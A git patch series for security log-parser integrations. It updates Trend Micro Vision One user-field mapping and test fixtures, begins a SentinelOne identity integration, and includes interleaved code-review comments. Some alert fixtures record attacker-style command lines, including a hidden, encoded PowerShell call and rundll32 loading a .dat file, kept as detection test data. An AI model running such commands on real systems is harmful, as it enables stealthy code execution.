@@ -1,7 +1,7 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 -name: Trend Micro Vision One +name: Trend Micro Vision One [BETA] slug: trend-micro-vision-one description: >- diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index a13ee54b2..3446a59f6 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -25,8 +25,6 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" @@ -39,6 +37,14 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\')[0]}}" + user.domain: "{{final.user.id.split('\\\\')[1]}}" + filter: "{{final.user.id != null}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" 
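Review bot: The added user.name/user.domain lines assume `final.user.id` always contains a backslash: `split('\\\\')[1]` raises IndexError for an unqualified account name or a UPN, and the stage's `filter` only guards against null. The follow-up hunk in PATCH 092 swaps to `| first`/`| last`, which removes the exception but then sets user.domain equal to user.name whenever no separator is present, so the gap survives; guard the domain assignment on the separator and keep the name assignment unconditional, as below (written against the 092 form). Separately, dropping `organization.name`/`organization.id` relocates the account entity to `user.id`, which a commit titled "Fixes and improvements" does not say; a changelog line would help consumers with rules on the old field. Whether `| first` on an empty selectattr result raises or yields null in this engine is not visible here; the null check in the filter suggests the latter.
```yaml
  - set:
      user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"

  # account entityValue is DOMAIN\user; the domain is only known when the
  # separator is present, so an unqualified name or UPN must not fill user.domain
  - set:
      user.domain: "{{ final.user.id.split('\\\\') | first }}"
    filter: "{{ final.user.id != null and '\\\\' in final.user.id }}"

  - set:
      user.name: "{{ final.user.id.split('\\\\') | last }}"
    filter: "{{ final.user.id != null }}"
```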
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index e6bcf0088..769477b65 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json 
@@ -3,7 +3,7 @@ "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": 
\"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], 
\"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" }, "expected": { - "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", 
\"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], 
\"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": 
\"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", "event": { "category": [ "intrusion_detection" @@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "john\\doe", - "name": "john\\doe" - }, "process": { "command_line": "C:\\WINDOWS\\Explorer.EXE", "executable": "C:\\Windows\\explorer.exe", @@ -68,6 +64,8 @@ } }, "user": { + "domain": "doe", + "id": "john\\doe", "name": "doe" } } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index d6ef4acd1..560c2ce13 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json 
@@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "shockwave\\sam", - "name": "shockwave\\sam" - }, "process": { "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", @@ -50,6 +46,9 @@ ], "ip": [ "10.10.58.51" + ], + "user": [ + "shockwave" ] }, "rule": { @@ -62,6 +61,11 @@ "severity": "high", "status": "Open" } + }, + "user": { + "domain": "sam", + "id": "shockwave\\sam", + "name": "shockwave" } } } \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 3c32834ae..9159ec844 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -29,10 +29,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "shockwave\\sam", - "name": "shockwave\\sam" - }, "process": { "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", "parent": { @@ -52,6 +48,9 @@ "related": { "ip": [ "10.10.58.51" + ], + "user": [ + "shockwave" ] }, "rule": { @@ -68,7 +67,10 @@ } }, "user": { - "email": "support@pctutordetroit.com" + "domain": "sam", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "shockwave" } } } \ No newline at end of file From e93cd918eba05ba91b7e501ccd72d2f4c383c05d Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia <135212489+lvoloshyn-sekoia@users.noreply.github.com>
Date: Tue, 26 Nov 2024 12:10:22 +0200
Subject: [PATCH 092/150] Update Trend Micro/trend-micro-vision-one/ingest/parser.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Sébastien Quioc
---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 3446a59f6..09ca7f331 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
@@ -41,8 +41,8 @@ stages:
 user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"
 - set:
- user.name: "{{final.user.id.split('\\\\')[0]}}"
- user.domain: "{{final.user.id.split('\\\\')[1]}}"
+ user.name: "{{final.user.id.split('\\\\') | last}}"
+ user.domain: "{{final.user.id.split('\\\\') | first}}"
 filter: "{{final.user.id != null}}"
 - set:
From 454ad36347fe76d2363d7652a1d1a89125f5f15c Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia
Date: Tue, 26 Nov 2024 12:11:14 +0200
Subject: [PATCH 093/150] Fix tests
---
 .../tests/test_internal_network_scanner.json | 2 +-
 Trend Micro/trend-micro-vision-one/tests/test_process.json | 6 +++---
 Trend Micro/trend-micro-vision-one/tests/test_registry.json | 6 +++---
 3 files changed, 7 insertions(+), 7 deletions(-)
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index 769477b65..b31951fe2 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
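Review bot: The new `user.domain` line still assigns a domain when `final.user.id` contains no backslash, because `split('\\\\') | first` then returns the whole id, so an account entity such as `sam` ends up with `user.domain: sam` and `user.name: sam` at once, whereas the removed `[1]` index would presumably have errored on that input instead. The `filter` line below the added pair only checks for null, so I would move the domain assignment into its own action guarded on the separator: `- set:` / `user.domain: "{{final.user.id.split('\\\\') | first}}"` / `filter: "{{final.user.id != null and '\\\\' in final.user.id}}"`. Whether ids in UPN form (`user@domain`) also reach this stage I cannot tell from the hunk; if they do, the same guard leaves the domain unset rather than wrong. The enclosing `stages:` block continues outside the hunk.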
@@ -64,7 +64,7 @@ } }, "user": { - "domain": "doe", + "domain": "john", "id": "john\\doe", "name": "doe" } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 560c2ce13..9c013b1c0 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -48,7 +48,7 @@ "10.10.58.51" ], "user": [ - "shockwave" + "sam" ] }, "rule": { @@ -63,9 +63,9 @@ } }, "user": { - "domain": "sam", + "domain": "shockwave", "id": "shockwave\\sam", - "name": "shockwave" + "name": "sam" } } } \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 9159ec844..83d7e99b5 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -50,7 +50,7 @@ "10.10.58.51" ], "user": [ - "shockwave" + "sam" ] }, "rule": { @@ -67,10 +67,10 @@ } }, "user": { - "domain": "sam", + "domain": "shockwave", "email": "support@pctutordetroit.com", "id": "shockwave\\sam", - "name": "shockwave" + "name": "sam" } } } \ No newline at end of file From 0cc29cf19f55d2373a36d2a9d29729216df11881 Mon Sep 17 00:00:00 2001 
From: vg-svitla Date: Wed, 27 Nov 2024 12:15:11 +0200 Subject: [PATCH 094/150] Feature: SentinelOne Singularity --- SentinelOne/identity/CHANGELOG.md | 8 +++ SentinelOne/identity/_meta/fields.yml | 39 ++++++++++ SentinelOne/identity/_meta/logo.png | Bin 0 -> 27937 bytes SentinelOne/identity/_meta/manifest.yml | 8 +++ .../identity/_meta/smart-descriptions.json | 46 ++++++++++++ SentinelOne/identity/ingest/parser.yml | 67 ++++++++++++++++++ SentinelOne/identity/tests/test_alert_1.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_10.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_11.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_12.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_13.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_14.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_15.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_16.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_2.json | 22 ++++++ SentinelOne/identity/tests/test_alert_3.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_4.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_5.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_6.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_7.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_8.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_9.json | 34 +++++++++ 22 files changed, 850 insertions(+) create mode 100644 SentinelOne/identity/CHANGELOG.md create mode 100644 SentinelOne/identity/_meta/fields.yml create mode 100644 SentinelOne/identity/_meta/logo.png create mode 100644 SentinelOne/identity/_meta/manifest.yml create mode 100644 SentinelOne/identity/_meta/smart-descriptions.json create mode 100644 SentinelOne/identity/ingest/parser.yml create mode 100644 SentinelOne/identity/tests/test_alert_1.json create mode 100644 SentinelOne/identity/tests/test_alert_10.json create mode 100644 
SentinelOne/identity/tests/test_alert_11.json
create mode 100644 SentinelOne/identity/tests/test_alert_12.json
create mode 100644 SentinelOne/identity/tests/test_alert_13.json
create mode 100644 SentinelOne/identity/tests/test_alert_14.json
create mode 100644 SentinelOne/identity/tests/test_alert_15.json
create mode 100644 SentinelOne/identity/tests/test_alert_16.json
create mode 100644 SentinelOne/identity/tests/test_alert_2.json
create mode 100644 SentinelOne/identity/tests/test_alert_3.json
create mode 100644 SentinelOne/identity/tests/test_alert_4.json
create mode 100644 SentinelOne/identity/tests/test_alert_5.json
create mode 100644 SentinelOne/identity/tests/test_alert_6.json
create mode 100644 SentinelOne/identity/tests/test_alert_7.json
create mode 100644 SentinelOne/identity/tests/test_alert_8.json
create mode 100644 SentinelOne/identity/tests/test_alert_9.json
diff --git a/SentinelOne/identity/CHANGELOG.md b/SentinelOne/identity/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/SentinelOne/identity/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/SentinelOne/identity/_meta/fields.yml b/SentinelOne/identity/_meta/fields.yml
new file mode 100644
index 000000000..36e8acf65
--- /dev/null
+++ b/SentinelOne/identity/_meta/fields.yml
@@ -0,0 +1,39 @@
+sentinelone.identity.attackSurfaces:
+ description: ''
+ name: sentinelone.identity.attackSurfaces
+ type: keyword
+
+sentinelone.identity.classification:
+ description: ''
+ name: sentinelone.identity.classification
+ type: keyword
+
+sentinelone.identity.confidenceLevel:
+ description: ''
+ name: sentinelone.identity.confidenceLevel
+ type: keyword
+
+sentinelone.identity.id:
+ description: ''
+ name: sentinelone.identity.id
+ type: keyword
+
+sentinelone.identity.name:
+ description: ''
+ name: sentinelone.identity.name
+ type: keyword
+
+sentinelone.identity.result:
+ description: ''
+ name: sentinelone.identity.result
+ type: keyword
+
+sentinelone.identity.status:
+ description: ''
+ name: sentinelone.identity.status
+ type: keyword
+
+sentinelone.identity.storyLineId:
+ description: ''
+ name: sentinelone.identity.storyLineId
+ type: keyword
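Review bot: Every one of the eight field definitions in this hunk carries `description: ''`, so the custom `sentinelone.identity.*` fields are exposed to analysts with no explanation of what they hold. Each entry should get a one-line description taken from the vendor's alert schema, e.g. `description: 'Status of the alert as reported by SentinelOne Singularity Identity'` for `sentinelone.identity.status`, and the same for `attackSurfaces`, `classification`, `confidenceLevel`, `result` and `storyLineId`, whose meaning is least obvious from the name alone.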
